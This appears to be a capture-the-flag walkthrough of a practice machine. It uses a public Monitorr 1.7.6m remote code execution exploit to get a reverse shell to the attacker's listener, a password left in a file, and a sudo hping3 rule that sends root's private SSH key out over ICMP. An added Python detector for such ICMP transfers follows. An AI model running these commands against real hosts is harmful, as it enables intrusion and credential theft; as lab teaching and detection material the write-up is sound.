RATING
Intermediate
ENUMERATION
As usual, we start off with our nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.250.218

Navigating to our target in a browser, we are redirected to http://192.168.250.218/mon and are met with a site running Monitorr 1.7.6m:

We search searchsploit for this version of Monitorr and find an unauthenticated remote code execution exploit, which we copy into our working directory:
Command: searchsploit monitorr 1.7.6m
Command: searchsploit -m 48980.py

EXPLOITATION
We run the exploit, passing it the URL of the target as well as the IP and port of our netcat listener:
Command: python3 48980.py http://192.168.250.218/mon/ 192.168.45.229 1234

Once it executes, we catch the reverse shell on our netcat listener and find ourselves running as user www-data:

Looking through the home directory of user fox, we find some files of interest:
Command: ls -la

Taking a look at the contents of the reminder file, we see mention of crypt.php:
Command: cat reminder

We find crypt.php inside the devel directory. Inspecting it, we see what looks like a password, BUHNIJMONIBUVCYTTYVGBUHJNI:
Command: ls -la devel/crypt.php

Using this newly discovered password, we SSH as user fox to the target:
Command: ssh fox@192.168.250.218

PRIVILEGE ESCALATION
We check for sudo privileges and see that user fox can run the hping3 binary with elevated privileges. Because the sudo rule restricts us to hping3’s ICMP mode, we can’t use it to spawn a shell directly:
Command: sudo -l

We can, however, use it to transfer files that only root can read (for example, root’s private SSH key), by sending the file’s contents as ICMP payload tagged with a signature string:
Command: sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa

On the receiving side, hping3 in listen mode waits for packets carrying the same signature and dumps the data that follows it, giving us the contents of root’s id_rsa file:
Command: sudo hping3 --icmp 127.0.0.1 --listen signature --safe

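The ICMP file transfer above is exactly the kind of traffic a defender should be able to spot: echo requests whose payloads are far larger or more text-like than a normal ping, and which carry a PEM private-key header. The following script is an added detection example written for this write-up; it is not part of the original post and is not hping3 code. It parses raw ICMP echo messages, flags payloads that look like a signed file transfer, and reassembles the carried text so an analyst can confirm what left the host. It assumes the hping3 layout in which the --sign string precedes each chunk of file data (which is what --listen keys on), and the list of "usual" ping payload sizes is a constructed heuristic, not a standard. The sample capture is constructed inline and contains a fake key, not real key material.

```python
"""Added detection example (not from the original write-up): flag ICMP echo
payloads that look like hping3 --icmp --sign/--file transfers and reassemble
the carried text so an analyst can confirm what was exfiltrated."""
import string
import struct
from typing import Optional

PRINTABLE = set(bytes(string.printable, "ascii"))
# Payload sizes produced by ordinary ping implementations (constructed heuristic).
USUAL_PING_SIZES = {0, 32, 56, 64}
KEY_MARKERS = (b"-----BEGIN ", b"PRIVATE KEY-----")


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over ICMP header + payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Build a raw ICMP echo request (type 8) carrying `payload`; used only to
    construct the sample capture below."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    chk = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, chk, ident, seq) + payload


def parse_icmp(packet: bytes) -> dict:
    """Split a raw ICMP message into header fields and payload, verifying the checksum."""
    if len(packet) < 8:
        raise ValueError("ICMP message shorter than its 8-byte header")
    itype, code, chk, ident, seq = struct.unpack("!BBHHH", packet[:8])
    # Recompute over the message with the checksum field zeroed.
    valid = icmp_checksum(packet[:2] + b"\x00\x00" + packet[4:]) == chk
    return {"type": itype, "code": code, "ident": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": valid}


def suspicious_reasons(payload: bytes, signature: Optional[bytes] = None) -> list:
    """Return the reasons an echo payload looks like a covert file transfer
    (empty list means nothing suspicious)."""
    reasons = []
    if signature and payload.startswith(signature):
        reasons.append("starts with the --sign marker %r" % signature)
    if any(m in payload for m in KEY_MARKERS):
        reasons.append("contains a PEM private-key marker")
    if payload and len(payload) not in USUAL_PING_SIZES:
        printable = sum(b in PRINTABLE for b in payload) / len(payload)
        if printable > 0.9:
            reasons.append("%d-byte payload is %.0f%% printable text"
                           % (len(payload), printable * 100))
    return reasons


def scan_stream(packets: list, signature: Optional[bytes] = None):
    """Classify each ICMP echo request in a capture.
    Returns ([(index, reasons), ...], reassembled_bytes)."""
    flagged, carried = [], bytearray()
    for i, pkt in enumerate(packets):
        msg = parse_icmp(pkt)
        if msg["type"] != 8 or not msg["checksum_ok"]:
            continue
        why = suspicious_reasons(msg["payload"], signature)
        if why:
            flagged.append((i, why))
            body = msg["payload"]
            if signature and body.startswith(signature):
                body = body[len(signature):]  # strip the marker, keep the file data
            carried += body
    return flagged, bytes(carried)


# Constructed sample capture: one ordinary 56-byte ping, then a fake key sent in
# chunks the way "hping3 --icmp -d 100 --sign signature --file ..." would.
SIGNATURE = b"signature"  # the --sign value used in the write-up
FAKE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
            b"AAAA-constructed-sample-not-a-real-key-AAAA\n"
            b"-----END OPENSSH PRIVATE KEY-----\n")
CHUNK = 100 - len(SIGNATURE)  # -d 100 leaves 91 bytes of file data per packet
SAMPLE_CAPTURE = [build_icmp_echo(bytes(range(56)), seq=1)] + [
    build_icmp_echo(SIGNATURE + FAKE_KEY[i:i + CHUNK], seq=n + 2)
    for n, i in enumerate(range(0, len(FAKE_KEY), CHUNK))
]


def demo():
    """Run the detector over the constructed capture."""
    return scan_stream(SAMPLE_CAPTURE, SIGNATURE)


if __name__ == "__main__":
    flagged, carried = demo()
    for idx, why in flagged:
        print("packet %d flagged: %s" % (idx, "; ".join(why)))
    print("reassembled payload:\n" + carried.decode("ascii", "replace"))
```

In a real deployment the packet list would come from a pcap or a raw socket feed rather than the constructed capture, and the printable-text and size heuristics would be tuned to the environment's normal ping traffic; the key-marker check, by contrast, is a high-confidence indicator on its own. Restricting sudo rules so that a user cannot hand hping3 an arbitrary --file argument is the corresponding preventive control.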
With root’s id_rsa in hand, we restrict its permissions so the SSH client accepts it, SSH to the target as root and read our proof.txt:
Command: chmod 600 id_rsa
Command: ssh -i id_rsa root@192.168.250.218
